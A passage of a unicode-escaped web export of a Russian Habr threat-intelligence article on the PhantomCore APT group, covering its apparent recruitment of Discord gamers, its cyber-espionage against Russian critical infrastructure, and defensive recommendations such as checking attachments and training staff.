\u0440\u0443\u0441\u0441\u043a\u043e\u0433\u043e\u0432\u043e\u0440\u044f\u0449\u0438\u0435 \u0443\u0447\u0430\u0441\u0442\u043d\u0438\u043a\u0438 \u0438\u0433\u0440\u043e\u0432\u044b\u0445 Discord\u2011\u0441\u043e\u043e\u0431\u0449\u0435\u0441\u0442\u0432, \u0440\u044f\u0434 \u043a\u043e\u0442\u043e\u0440\u044b\u0445 \u0434\u043e\u0441\u0442\u043e\u0432\u0435\u0440\u043d\u043e \u044f\u0432\u043b\u044f\u044e\u0442\u0441\u044f \u043d\u0435\u0441\u043e\u0432\u0435\u0440\u0448\u0435\u043d\u043d\u043e\u043b\u0435\u0442\u043d\u0438\u043c\u0438 \u0433\u0440\u0430\u0436\u0434\u0430\u043d\u0430\u043c\u0438 \u0420\u043e\u0441\u0441\u0438\u0438 \u0441\u00a0\u043d\u0435\u0437\u043d\u0430\u0447\u0438\u0442\u0435\u043b\u044c\u043d\u044b\u043c \u043e\u043f\u044b\u0442\u043e\u043c \u0432\u00a0\u043f\u0440\u043e\u0432\u0435\u0434\u0435\u043d\u0438\u0438 \u043a\u0438\u0431\u0435\u0440\u0430\u0442\u0430\u043a, \u043f\u043e\u043b\u0443\u0447\u0438\u0432\u0448\u0438\u043c\u0438 \u0438\u0441\u0445\u043e\u0434\u043d\u0438\u043a\u0438 \u0431\u044d\u043a\u0434\u043e\u0440\u0430 \u0438 \u043a\u043e\u043d\u0441\u0443\u043b\u044c\u0442\u0430\u0446\u0438\u0438 \u043f\u043e\u00a0\u0435\u0433\u043e \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 \u043e\u0442\u00a0\u0443\u0447\u0430\u0441\u0442\u043d\u0438\u043a\u0430 \u0433\u0440\u0443\u043f\u043f\u044b \u0441\u00a0\u0431\u043e\u043b\u0435\u0435 \u044f\u0440\u043a\u0438\u043c \u043a\u0438\u0431\u0435\u0440\u043a\u0440\u0438\u043c\u0438\u043d\u0430\u043b\u044c\u043d\u044b\u043c \u0431\u044d\u043a\u0433\u0440\u0430\u0443\u043d\u0434\u043e\u043c.<\/p>\n<p>\u0412\u043e\u0437\u043c\u043e\u0436\u043d\u043e, \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u043d\u0430\u044f \u0433\u0440\u0443\u043f\u043f\u0430 \u044f\u0432\u043b\u044f\u0435\u0442\u0441\u044f \u043e\u0442\u0432\u0435\u0442\u0432\u043b\u0435\u043d\u0438\u0435\u043c \u0433\u0440\u0443\u043f\u043f\u0438\u0440\u043e\u0432\u043a\u0438, \u043d\u0435\u00a0\u0432\u0445\u043e\u0434\u044f\u0449\u0438\u043c \u0432\u00a0\u043e\u0441\u043d\u043e\u0432\u043d\u043e\u0435 \u0437\u0432\u0435\u043d\u043e, \u0441\u043e\u0441\u0442\u043e\u0438\u0442 \u0438\u0437\u00a0\u043d\u0438\u0437\u043a\u043e\u043a\u0432\u0430\u043b\u0438\u0444\u0438\u0446\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0445 \u0441\u043f\u0435\u0446\u0438\u0430\u043b\u0438\u0441\u0442\u043e\u0432, \u043f\u043e\u0434\u0431\u0438\u0440\u0430\u0435\u043c\u044b\u0445 \u0432\u00a0\u0438\u0433\u0440\u043e\u0432\u043e\u043c \u043a\u043e\u043c\u044c\u044e\u043d\u0438\u0442\u0438 \u0438 Discord\u2011\u0441\u043e\u043e\u0431\u0449\u0435\u0441\u0442\u0432\u0430\u0445, \u0438 \u043e\u0440\u0433\u0430\u043d\u0438\u0437\u043e\u0432\u0430\u043d\u0430 \u0432\u00a0\u043a\u0430\u0447\u0435\u0441\u0442\u0432\u0435 \u0441\u043e\u0431\u0441\u0442\u0432\u0435\u043d\u043d\u043e\u0433\u043e \u043a\u0438\u0431\u0435\u0440\u043a\u0440\u0438\u043c\u0438\u043d\u0430\u043b\u044c\u043d\u043e\u0433\u043e \u0441\u0442\u0430\u0440\u0442\u0430\u043f\u0430 \u043e\u0434\u043d\u0438\u043c \u0438\u0437\u00a0\u0447\u043b\u0435\u043d\u043e\u0432 \u043e\u0441\u043d\u043e\u0432\u043d\u043e\u0433\u043e \u043a\u043e\u0441\u0442\u044f\u043a\u0430 PhantomCore, \u0438\u043c\u0435\u044e\u0449\u0438\u043c \u0434\u043e\u0441\u0442\u0443\u043f \u043a\u00a0\u0438\u0441\u0445\u043e\u0434\u043d\u0438\u043a\u0430\u043c \u043a\u0430\u0441\u0442\u043e\u043c\u043d\u044b\u0445 \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442\u043e\u0432.<\/p>\n<h2>\u0417\u0430\u043a\u043b\u044e\u0447\u0435\u043d\u0438\u0435<\/h2>\n<p>\u0410\u043a\u0442\u0438\u0432\u043d\u043e\u0441\u0442\u044c APT\u2011\u0433\u0440\u0443\u043f\u043f\u0438\u0440\u043e\u0432\u043a\u0438 PhantomCore \u043e\u0442\u0441\u043b\u0435\u0436\u0438\u0432\u0430\u0435\u0442\u0441\u044f \u0441\u00a0\u043d\u0430\u0447\u0430\u043b\u0430 2024\u00a0\u0433\u043e\u0434\u0430, \u043d\u0430\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0430 \u0438\u0441\u043a\u043b\u044e\u0447\u0438\u0442\u0435\u043b\u044c\u043d\u043e \u043d\u0430\u00a0\u043a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u0438 \u0437\u043d\u0430\u0447\u0438\u043c\u0443\u044e \u0438\u043d\u0444\u0440\u0430\u0441\u0442\u0440\u0443\u043a\u0442\u0443\u0440\u0443 \u0420\u043e\u0441\u0441\u0438\u0438, \u043c\u043e\u0442\u0438\u0432\u0430\u0446\u0438\u044f\u00a0\u2014 \u043a\u0438\u0431\u0435\u0440\u0448\u043f\u0438\u043e\u043d\u0430\u0436. \u041a\u0438\u0431\u0435\u0440\u0430\u0442\u0430\u043a\u0438 \u0433\u0440\u0443\u043f\u043f\u0438\u0440\u043e\u0432\u043a\u0438 \u043e\u0442\u043b\u0438\u0447\u0430\u044e\u0442\u0441\u044f \u0437\u043d\u0430\u0447\u0438\u0442\u0435\u043b\u044c\u043d\u044b\u043c\u0438 \u043c\u0430\u0441\u0448\u0442\u0430\u0431\u0430\u043c\u0438 \u043f\u0440\u0438\u00a0\u0441\u043e\u0445\u0440\u0430\u043d\u0435\u043d\u0438\u0438 \u0432\u044b\u0441\u043e\u043a\u043e\u0439 \u0441\u043a\u0440\u044b\u0442\u043d\u043e\u0441\u0442\u0438: \u0445\u0430\u043a\u0435\u0440\u044b \u0434\u043e\u043b\u0433\u043e \u043d\u0430\u0445\u043e\u0434\u044f\u0442\u0441\u044f \u0432\u00a0\u0441\u043a\u043e\u043c\u043f\u0440\u043e\u043c\u0435\u0442\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u043e\u0439 \u0441\u0435\u0442\u0438, \u043e\u0441\u0442\u0430\u0432\u0430\u044f\u0441\u044c \u043d\u0435\u0437\u0430\u043c\u0435\u0447\u0435\u043d\u043d\u044b\u043c\u0438, \u0447\u0442\u043e\u00a0\u0434\u043e\u0441\u0442\u0438\u0433\u0430\u0435\u0442\u0441\u044f \u043f\u0443\u0442\u0435\u043c \u0440\u0435\u0433\u0443\u043b\u044f\u0440\u043d\u043e\u0433\u043e \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u044f \u0438 \u044d\u0432\u043e\u043b\u044e\u0446\u0438\u0438 \u043d\u0430\u0441\u0442\u0443\u043f\u0430\u0442\u0435\u043b\u044c\u043d\u043e\u0433\u043e \u0430\u0440\u0441\u0435\u043d\u0430\u043b\u0430 \u0441\u043e\u0431\u0441\u0442\u0432\u0435\u043d\u043d\u043e\u0439 \u0440\u0430\u0437\u0440\u0430\u0431\u043e\u0442\u043a\u0438.<\/p>\n<p>\u042d\u0444\u0444\u0435\u043a\u0442\u0438\u0432\u043d\u0430\u044f \u0437\u0430\u0449\u0438\u0442\u0430 \u043e\u0442\u00a0\u043f\u043e\u0434\u043e\u0431\u043d\u044b\u0445 \u0443\u0441\u0442\u043e\u0439\u0447\u0438\u0432\u044b\u0445 \u0441\u043b\u043e\u0436\u043d\u044b\u0445 \u043a\u0438\u0431\u0435\u0440\u0443\u0433\u0440\u043e\u0437 \u043c\u043e\u0436\u0435\u0442\u00a0\u0431\u044b\u0442\u044c \u043e\u0431\u0435\u0441\u043f\u0435\u0447\u0435\u043d\u0430 \u0438\u0441\u043a\u043b\u044e\u0447\u0438\u0442\u0435\u043b\u044c\u043d\u043e \u043f\u0443\u0442\u0435\u043c \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u044f \u043a\u043e\u043c\u043f\u043b\u0435\u043a\u0441\u043d\u044b\u0445 \u0440\u0435\u0448\u0435\u043d\u0438\u0439, \u0441\u043e\u0447\u0435\u0442\u0430\u044e\u0449\u0438\u0445 \u0432\u00a0\u0441\u0435\u0431\u0435 \u0440\u0430\u043d\u0435\u0435 \u043d\u0430\u043a\u043e\u043f\u043b\u0435\u043d\u043d\u0443\u044e \u0434\u0435\u0442\u0435\u043a\u0442\u0438\u0440\u0443\u044e\u0449\u0443\u044e \u044d\u043a\u0441\u043f\u0435\u0440\u0442\u0438\u0437\u0443 \u0438 \u0430\u043a\u0442\u0443\u0430\u043b\u044c\u043d\u044b\u0435 \u0434\u0430\u043d\u043d\u044b\u0435 \u043a\u0438\u0431\u0435\u0440\u0440\u0430\u0437\u0432\u0435\u0434\u043a\u0438.<\/p>\n<p>\u042d\u043a\u0441\u043f\u0435\u0440\u0442\u043d\u044b\u0439 \u0446\u0435\u043d\u0442\u0440 \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438 Positive Technologies \u043f\u0440\u043e\u0433\u043d\u043e\u0437\u0438\u0440\u0443\u0435\u0442 \u0441\u043e\u0445\u0440\u0430\u043d\u0435\u043d\u0438\u0435 \u0432\u044b\u0441\u043e\u043a\u043e\u0433\u043e \u0443\u0440\u043e\u0432\u043d\u044f \u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438 \u043a\u0438\u0431\u0435\u0440\u0443\u0433\u0440\u043e\u0437 \u0434\u043b\u044f\u00a0\u0440\u043e\u0441\u0441\u0438\u0439\u0441\u043a\u0438\u0445 \u043e\u0440\u0433\u0430\u043d\u0438\u0437\u0430\u0446\u0438\u0439, \u0438\u0441\u0445\u043e\u0434\u044f\u0449\u0438\u0445 \u043e\u0442\u00a0APT\u2011\u0433\u0440\u0443\u043f\u043f\u0438\u0440\u043e\u0432\u043a\u0438 PhantomCore. TI\u2011\u0434\u0435\u043f\u0430\u0440\u0442\u0430\u043c\u0435\u043d\u0442 PT ESC \u043f\u0440\u043e\u0434\u043e\u043b\u0436\u0430\u0435\u0442 \u043e\u0442\u0441\u043b\u0435\u0436\u0438\u0432\u0430\u0442\u044c \u0430\u043a\u0442\u0438\u0432\u043d\u043e\u0441\u0442\u044c \u0433\u0440\u0443\u043f\u043f\u0438\u0440\u043e\u0432\u043a\u0438, \u0441\u0432\u043e\u0435\u0432\u0440\u0435\u043c\u0435\u043d\u043d\u043e \u043f\u0440\u0435\u0434\u0443\u043f\u0440\u0435\u0436\u0434\u0430\u0442\u044c\u00a0\u0436\u0435\u0440\u0442\u0432 \u043e\u00a0\u0433\u043e\u0442\u043e\u0432\u044f\u0449\u0438\u0445\u0441\u044f \u043a\u0438\u0431\u0435\u0440\u0430\u0442\u0430\u043a\u0430\u0445 \u0438 \u043f\u043e\u0441\u0442\u0430\u0432\u043b\u044f\u0442\u044c \u0443\u043d\u0438\u043a\u0430\u043b\u044c\u043d\u044b\u0435 \u0434\u0430\u043d\u043d\u044b\u0435 \u043a\u0438\u0431\u0435\u0440\u0440\u0430\u0437\u0432\u0435\u0434\u043a\u0438 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f\u043c \u043f\u0440\u043e\u0434\u0443\u043a\u0442\u043e\u0432 Positive Technologies.<\/p>\n<h3>\u0420\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0430\u0446\u0438\u0438 \u043f\u043e \u0437\u0430\u0449\u0438\u0442\u0435<\/h3>\n<p>\u0412\u00a0\u0446\u0435\u043b\u044f\u0445 \u0437\u0430\u0449\u0438\u0442\u044b \u043e\u0442\u00a0\u043a\u0438\u0431\u0435\u0440\u0430\u0442\u0430\u043a APT\u2011\u0433\u0440\u0443\u043f\u043f\u0438\u0440\u043e\u0432\u043a\u0438 PhantomCore \u0440\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0443\u0435\u0442\u0441\u044f:<\/p>\n<ul>\n<li>\n<p>\u0418\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c\u00a0\u043b\u0438\u0446\u0435\u043d\u0437\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0435 \u0441\u0440\u0435\u0434\u0441\u0442\u0432\u0430 \u0430\u043d\u0442\u0438\u0432\u0438\u0440\u0443\u0441\u043d\u043e\u0439 \u0437\u0430\u0449\u0438\u0442\u044b \u0441\u00a0\u0430\u043a\u0442\u0443\u0430\u043b\u044c\u043d\u044b\u043c\u0438 \u0438 \u0440\u0435\u0433\u0443\u043b\u044f\u0440\u043d\u043e \u043e\u0431\u043d\u043e\u0432\u043b\u044f\u0435\u043c\u044b\u043c\u0438 \u0431\u0430\u0437\u0430\u043c\u0438 \u0441\u0438\u0433\u043d\u0430\u0442\u0443\u0440.<\/p>\n<\/li>\n<li>\n<p>\u041f\u0440\u043e\u0432\u0435\u0440\u044f\u0442\u044c \u0441\u00a0\u043f\u043e\u043c\u043e\u0449\u044c\u044e \u0441\u0440\u0435\u0434\u0441\u0442\u0432 \u0430\u043d\u0442\u0438\u0432\u0438\u0440\u0443\u0441\u043d\u043e\u0439 \u0437\u0430\u0449\u0438\u0442\u044b \u0432\u043b\u043e\u0436\u0435\u043d\u0438\u044f \u0432\u00a0\u044d\u043b\u0435\u043a\u0442\u0440\u043e\u043d\u043d\u044b\u0445 \u043f\u0438\u0441\u044c\u043c\u0430\u0445, \u043f\u043e\u0441\u0442\u0443\u043f\u0430\u044e\u0449\u0438\u0445 \u043e\u0442\u00a0\u043d\u0435\u0434\u043e\u0432\u0435\u0440\u0435\u043d\u043d\u044b\u0445 \u0438 \u043f\u043e\u0434\u043e\u0437\u0440\u0438\u0442\u0435\u043b\u044c\u043d\u044b\u0445 \u043e\u0442\u043f\u0440\u0430\u0432\u0438\u0442\u0435\u043b\u0435\u0439. \u041d\u0430\u0441\u0442\u043e\u0440\u043e\u0436\u0438\u0442\u044c\u0441\u044f \u0441\u0442\u043e\u0438\u0442, \u0435\u0441\u043b\u0438 \u043e\u0442\u0441\u0443\u0442\u0441\u0442\u0432\u0443\u0435\u0442 \u0438\u0441\u0442\u043e\u0440\u0438\u044f \u043f\u0435\u0440\u0435\u043f\u0438\u0441\u043a\u0438 \u0441\u00a0\u043e\u0442\u043f\u0440\u0430\u0432\u0438\u0442\u0435\u043b\u0435\u043c, \u0430\u00a0\u0442\u0430\u043a\u0436\u0435 \u0435\u0441\u043b\u0438 \u043e\u0442\u043f\u0440\u0430\u0432\u0438\u0442\u0435\u043b\u044c \u043d\u0435\u00a0\u044f\u0432\u043b\u044f\u0435\u0442\u0441\u044f \u043a\u043e\u043d\u0442\u0440\u0430\u0433\u0435\u043d\u0442\u043e\u043c, \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442 \u044d\u043b\u0435\u043a\u0442\u0440\u043e\u043d\u043d\u044b\u0439 \u0430\u0434\u0440\u0435\u0441 \u0441\u00a0\u043d\u0435\u0441\u0442\u0430\u043d\u0434\u0430\u0440\u0442\u043d\u044b\u043c \u0434\u043e\u043c\u0435\u043d\u043e\u043c, \u0430\u043a\u0446\u0435\u043d\u0442\u0438\u0440\u0443\u0435\u0442 \u0432\u043d\u0438\u043c\u0430\u043d\u0438\u0435 \u043d\u0430\u00a0\u0441\u0440\u043e\u0447\u043d\u043e\u0441\u0442\u0438 \u0438\u0437\u0443\u0447\u0435\u043d\u0438\u044f \u0434\u043e\u043a\u0443\u043c\u0435\u043d\u0442\u043e\u0432, \u043e\u0441\u043e\u0431\u0435\u043d\u043d\u043e \u043f\u043e\u0434\u0447\u0435\u0440\u043a\u0438\u0432\u0430\u0435\u0442 \u043d\u0430\u0437\u0432\u0430\u043d\u0438\u044f \u0433\u043e\u0441\u0443\u0434\u0430\u0440\u0441\u0442\u0432\u0435\u043d\u043d\u044b\u0445 \u0443\u0447\u0440\u0435\u0436\u0434\u0435\u043d\u0438\u0439, \u0440\u0435\u0433\u0443\u043b\u044f\u0442\u043e\u0440\u043e\u0432, \u043d\u0430\u0434\u0437\u043e\u0440\u043d\u044b\u0445 \u0432\u0435\u0434\u043e\u043c\u0441\u0442\u0432.<\/p>\n<\/li>\n<li>\n<p>\u041d\u0435\u00a0\u043e\u0442\u043a\u0440\u044b\u0432\u0430\u0442\u044c \u0437\u0430\u0449\u0438\u0449\u0435\u043d\u043d\u044b\u0435 \u043f\u0430\u0440\u043e\u043b\u044f\u043c\u0438 \u0430\u0440\u0445\u0438\u0432\u044b \u0438 \u0432\u043b\u043e\u0436\u0435\u043d\u043d\u044b\u0435 \u0444\u0430\u0439\u043b\u044b \u0431\u0435\u0437\u00a0\u0438\u0445 \u043f\u0440\u0435\u0434\u0432\u0430\u0440\u0438\u0442\u0435\u043b\u044c\u043d\u043e\u0439 \u043f\u0440\u043e\u0432\u0435\u0440\u043a\u0438 \u0441\u0440\u0435\u0434\u0441\u0442\u0432\u0430\u043c\u0438 \u0430\u043d\u0442\u0438\u0432\u0438\u0440\u0443\u0441\u043d\u043e\u0439 \u0437\u0430\u0449\u0438\u0442\u044b.<\/p>\n<\/li>\n<li>\n<p>\u041e\u0442\u043a\u043b\u044e\u0447\u0438\u0442\u044c \u0441\u043e\u043a\u0440\u044b\u0442\u0438\u0435 \u0440\u0430\u0441\u0448\u0438\u0440\u0435\u043d\u0438\u0439 \u0444\u0430\u0439\u043b\u043e\u0432, \u043f\u0440\u043e\u0432\u0435\u0440\u044f\u0442\u044c \u0440\u0435\u0430\u043b\u044c\u043d\u044b\u0435 \u0440\u0430\u0441\u0448\u0438\u0440\u0435\u043d\u0438\u044f \u0444\u0430\u0439\u043b\u043e\u0432: \u043d\u0435\u00a0\u043e\u0442\u043a\u0440\u044b\u0432\u0430\u0442\u044c \u0444\u0430\u0439\u043b\u044b, \u0437\u043d\u0430\u0447\u043e\u043a \u043a\u043e\u0442\u043e\u0440\u044b\u0445 \u043d\u0435\u00a0\u0441\u043e\u043e\u0442\u0432\u0435\u0442\u0441\u0442\u0432\u0443\u0435\u0442 \u0440\u0435\u0430\u043b\u044c\u043d\u043e\u043c\u0443 \u0440\u0430\u0441\u0448\u0438\u0440\u0435\u043d\u0438\u044e \u0444\u0430\u0439\u043b\u0430; \u043d\u0435\u00a0\u043e\u0442\u043a\u0440\u044b\u0432\u0430\u0442\u044c \u0444\u0430\u0439\u043b\u044b, \u0441\u043e\u0434\u0435\u0440\u0436\u0430\u0449\u0438\u0435 \u0432\u00a0\u043a\u043e\u043d\u0446\u0435 \u043d\u0430\u0437\u0432\u0430\u043d\u0438\u044f \u043d\u0435\u0441\u043a\u043e\u043b\u044c\u043a\u043e \u0440\u0430\u0441\u0448\u0438\u0440\u0435\u043d\u0438\u0439, \u0440\u0430\u0437\u0434\u0435\u043b\u0435\u043d\u043d\u044b\u0445 \u0442\u043e\u0447\u043a\u043e\u0439.<\/p>\n<\/li>\n<li>\n<p>\u0420\u0435\u0433\u0443\u043b\u044f\u0440\u043d\u043e \u043f\u0440\u043e\u0432\u043e\u0434\u0438\u0442\u044c \u043e\u0431\u0443\u0447\u0435\u043d\u0438\u0435 \u0438 \u0442\u0440\u0435\u043d\u0438\u043d\u0433\u0438 \u0441\u043e\u0442\u0440\u0443\u0434\u043d\u0438\u043a\u043e\u0432 \u043f\u043e\u00a0\u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u043c\u0443 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u044e \u044d\u043b\u0435\u043a\u0442\u0440\u043e\u043d\u043d\u043e\u0439 \u043f\u043e\u0447\u0442\u044b \u0438 \u043f\u0440\u043e\u0442\u0438\u0432\u043e\u0434\u0435\u0439\u0441\u0442\u0432\u0438\u044e \u043c\u0435\u0442\u043e\u0434\u0430\u043c \u0441\u043e\u0446\u0438\u0430\u043b\u044c\u043d\u043e\u0439 \u0438\u043d\u0436\u0435\u043d\u0435\u0440\u0438\u0438.<\/p>\n<\/li>\n<\/ul>\n<p>\u0418\u043d\u0434\u0438\u043a\u0430\u0442\u043e\u0440\u044b \u043a\u043e\u043c\u043f\u0440\u043e\u043c\u0435\u0442\u0430\u0446\u0438\u0438, \u0432\u0435\u0440\u0434\u0438\u043a\u0442\u044b \u043f\u0440\u043e\u0434\u0443\u043a\u0442\u043e\u0432 \u0438 \u0443\u043f\u043e\u043c\u0438\u043d\u0430\u0435\u043c\u044b\u0435 \u0432\u00a0\u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u043d\u0438\u0438 \u0442\u0435\u0445\u043d\u0438\u043a\u0438 \u0438 \u0442\u0430\u043a\u0442\u0438\u043a\u0438 \u0438\u0437\u00a0Mitre Att&amp;ck Matrix \u043c\u043e\u0436\u043d\u043e \u0438\u0437\u0443\u0447\u0438\u0442\u044c <a href=\"https:\/\/ptsecurity.com\/ru-ru\/research\/pt-esc-threat-intelligence\/phantom-pains-a-large-scale-cyber-espionage-campaign-and-a-possible-split-of-the-apt-group-phantomcore\/\" rel=\"noopener noreferrer nofollow\">\u0432\u00a0\u043f\u043e\u043b\u043d\u043e\u0439 \u0432\u0435\u0440\u0441\u0438\u0438 \u0440\u0430\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u043d\u0438\u044f<\/a>.<\/p>\n<hr\/>\n<p>\u041d\u0430\u00a0\u044d\u0442\u043e\u043c \u0432\u0441\u0451! \u0414\u043e\u00a0\u043d\u043e\u0432\u044b\u0445 \u0440\u0430\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u043d\u0438\u0439!<\/p>\n<div class=\"persona\"><img decoding=\"async\" class=\"image persona__image\" src=\"https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/e80\/55b\/1ee\/e8055b1ee82c41ba5b52d0ca4f16b4f4.jpg\" sizes=\"(max-width: 780px) 100vw, 50vw\" srcset=\"https:\/\/habrastorage.org\/r\/w780\/getpro\/habr\/upload_files\/e80\/55b\/1ee\/e8055b1ee82c41ba5b52d0ca4f16b4f4.jpg 780w,&#10;       https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/e80\/55b\/1ee\/e8055b1ee82c41ba5b52d0ca4f16b4f4.jpg 781w\" loading=\"lazy\" decode=\"async\"\/><\/p>\n<h5 class=\"persona__heading\">\u0412\u0438\u043a\u0442\u043e\u0440 \u041a\u0430\u0437\u0430\u043a\u043e\u0432<\/h5>\n<p class=\"persona__text\">\u0412\u0435\u0434\u0443\u0449\u0438\u0439 \u0441\u043f\u0435\u0446\u0438\u0430\u043b\u0438\u0441\u0442 \u0433\u0440\u0443\u043f\u043f\u044b \u043a\u0438\u0431\u0435\u0440\u0440\u0430\u0437\u0432\u0435\u0434\u043a\u0438 TI\u2011\u0434\u0435\u043f\u0430\u0440\u0442\u0430\u043c\u0435\u043d\u0442\u0430 \u044d\u043a\u0441\u043f\u0435\u0440\u0442\u043d\u043e\u0433\u043e \u0446\u0435\u043d\u0442\u0440\u0430 \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438 Positive Technologies<\/p>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<p><!----><!----><\/div>\n<p><!----><!----><br \/> \u0441\u0441\u044b\u043b\u043a\u0430 \u043d\u0430 \u043e\u0440\u0438\u0433\u0438\u043d\u0430\u043b \u0441\u0442\u0430\u0442\u044c\u0438 <a href=\"https:\/\/habr.com\/ru\/articles\/939942\/\"> https:\/\/habr.com\/ru\/articles\/939942\/<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<div><!--[--><!--]--><\/div>\n<div id=\"post-content-body\">\n<div>\n<div class=\"article-formatted-body article-formatted-body article-formatted-body_version-2\">\n<div xmlns=\"http:\/\/www.w3.org\/1999\/xhtml\">\n<figure class=\"full-width\"><\/figure>\n<p>\u0412\u043f\u0435\u0440\u0432\u044b\u0435 \u043e\u00a0\u0433\u0440\u0443\u043f\u043f\u0438\u0440\u043e\u0432\u043a\u0435 PhantomCore \u0441\u0442\u0430\u043b\u043e \u0438\u0437\u0432\u0435\u0441\u0442\u043d\u043e \u0432\u00a0\u043d\u0430\u0447\u0430\u043b\u0435 2024\u00a0\u0433\u043e\u0434\u0430. \u0417\u0430\u00a0\u043f\u0440\u043e\u0448\u0435\u0434\u0448\u0438\u0435 \u043f\u043e\u043b\u0442\u043e\u0440\u0430 \u0433\u043e\u0434\u0430 \u043e\u043d\u0430 \u0441\u0443\u0449\u0435\u0441\u0442\u0432\u0435\u043d\u043d\u043e \u043d\u0430\u0440\u0430\u0441\u0442\u0438\u043b\u0430 \u043d\u0430\u0441\u0442\u0443\u043f\u0430\u0442\u0435\u043b\u044c\u043d\u044b\u0439 \u0430\u0440\u0441\u0435\u043d\u0430\u043b, \u0440\u0430\u0441\u0448\u0438\u0440\u0438\u0432 \u0435\u0433\u043e \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442\u0430\u043c\u0438 \u0441\u043e\u0431\u0441\u0442\u0432\u0435\u043d\u043d\u043e\u0439 \u0440\u0430\u0437\u0440\u0430\u0431\u043e\u0442\u043a\u0438, \u0438 \u043e\u0442\u043c\u0435\u0442\u0438\u043b\u0430\u0441\u044c \u043c\u043d\u043e\u0433\u043e\u0447\u0438\u0441\u043b\u0435\u043d\u043d\u044b\u043c\u0438 \u043a\u0438\u0431\u0435\u0440\u0430\u0442\u0430\u043a\u0430\u043c\u0438 \u043d\u0430\u00a0\u043a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u0438 \u0437\u043d\u0430\u0447\u0438\u043c\u0443\u044e \u0438\u043d\u0444\u0440\u0430\u0441\u0442\u0440\u0443\u043a\u0442\u0443\u0440\u0443 \u0420\u043e\u0441\u0441\u0438\u0438 \u0441\u00a0\u0446\u0435\u043b\u044c\u044e \u0448\u043f\u0438\u043e\u043d\u0430\u0436\u0430.<\/p>\n<p>\u042d\u043a\u0441\u043f\u0435\u0440\u0442\u0438\u0437\u0430, \u043d\u0430\u043a\u043e\u043f\u043b\u0435\u043d\u043d\u0430\u044f \u043d\u0430\u043c\u0438 \u0432\u00a0\u043f\u0440\u043e\u0446\u0435\u0441\u0441\u0435 \u0442\u0449\u0430\u0442\u0435\u043b\u044c\u043d\u043e\u0433\u043e \u0438\u0437\u0443\u0447\u0435\u043d\u0438\u044f \u0433\u0440\u0443\u043f\u043f\u0438\u0440\u043e\u0432\u043a\u0438, \u0438 \u0432\u043d\u0443\u0442\u0440\u0435\u043d\u043d\u0438\u0435 \u0441\u0438\u0441\u0442\u0435\u043c\u044b \u043a\u0438\u0431\u0435\u0440\u0440\u0430\u0437\u0432\u0435\u0434\u043a\u0438 \u043e\u0431\u0435\u0441\u043f\u0435\u0447\u0438\u043b\u0438 \u043e\u043f\u0435\u0440\u0430\u0442\u0438\u0432\u043d\u043e\u0435 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u0438\u0435 \u0430\u043a\u0442\u0438\u0432\u043d\u043e\u0441\u0442\u0438 PhantomCore \u043d\u0435\u0432\u0437\u0438\u0440\u0430\u044f \u043d\u0430\u00a0\u044d\u0432\u043e\u043b\u044e\u0446\u0438\u044e \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0445 \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442\u043e\u0432. \u041f\u0440\u0438\u043d\u044f\u0442\u044b\u0435 \u043c\u0435\u0440\u044b \u043f\u043e\u0437\u0432\u043e\u043b\u0438\u043b\u0438 \u0432\u00a0\u043d\u0430\u0447\u0430\u043b\u0435 \u043c\u0430\u044f \u044d\u0442\u043e\u0433\u043e \u0433\u043e\u0434\u0430 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u0442\u044c \u043d\u043e\u0432\u0443\u044e \u043c\u0430\u0441\u0448\u0442\u0430\u0431\u043d\u0443\u044e \u043a\u0430\u043c\u043f\u0430\u043d\u0438\u044e \u043a\u0438\u0431\u0435\u0440\u0448\u043f\u0438\u043e\u043d\u0430\u0436\u0430 \u0432\u00a0\u043e\u0442\u043d\u043e\u0448\u0435\u043d\u0438\u0438 \u0440\u043e\u0441\u0441\u0438\u0439\u0441\u043a\u0438\u0445 \u043e\u0440\u0433\u0430\u043d\u0438\u0437\u0430\u0446\u0438\u0439.<\/p>\n<p>\u0412\u00a0\u0440\u0430\u043c\u043a\u0430\u0445 \u0435\u0435 \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u043d\u0438\u044f \u0443\u0434\u0430\u043b\u043e\u0441\u044c \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u0438\u0442\u044c \u043a\u043b\u044e\u0447\u0435\u0432\u0443\u044e 